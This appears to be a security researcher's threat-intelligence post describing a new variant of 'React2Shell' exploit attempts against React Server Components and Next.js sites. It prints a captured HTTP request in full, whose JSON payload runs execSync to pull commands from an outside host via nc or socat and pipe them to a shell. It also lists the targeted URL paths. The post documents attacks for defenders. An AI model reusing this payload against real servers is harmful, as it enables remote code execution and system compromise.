I have already talked about various React2Shell exploit attempts we have observed in the last weeks. But new varieties of the exploit are popping up, and the most recent one is using this particular version of the exploit:

POST /app HTTP/1.1
Host: 81.187.66.58
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Next-Action: 0
Rsc-Action: 0
Content-Length: 388
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
Connection: close

------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="$RSC"
Content-Type: application/json

{"0":{"0":{"0":{"constructor":{"constructor":{"constructor":"function() { const {execSync} = require('child_process'); return execSync('\n(nc 45.153.34.201 65050||socat - tcp:45.153.34.201:65050)|sh\n').toString(); }"}}}}}}
------WebKitFormBoundary7MA4YWxkTrZu0gW--

The overall idea is similar to what we have seen in the past. This version adds the "Rsc-Action" header, which I assume is supposed to target sites that expose react server components without Next.js. The "Next-Action" header is still present as well. The scans are also attempting different URLs:

/
/api
/app
/api/route
/_next/server

Other exploits have focused on the index page (/). I assume the pool of vulnerable systems is running dry, and attackers are diversifying their exploits a bit. Sadly, the host providing instructions for what to do next (45.153.34.201) is no longer providing these instructions.

--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|